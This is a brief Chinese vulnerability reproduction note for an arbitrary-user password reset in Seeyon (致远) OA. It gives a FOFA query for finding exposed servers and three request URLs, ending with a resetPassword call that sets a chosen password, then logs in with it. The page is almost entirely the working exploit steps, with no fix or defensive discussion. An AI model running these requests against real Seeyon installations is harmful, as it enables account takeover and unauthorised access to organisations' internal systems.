跳到主要内容

致远前台任意用户密码修改

致远前台任意用户密码修改

fofa

app="致远互联-OA"

漏洞复现

前提需要知道用户名

http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword

image-20240911113321578

http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx

修改密码为1qaz@WSX

http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX

最后使用修改的密码登录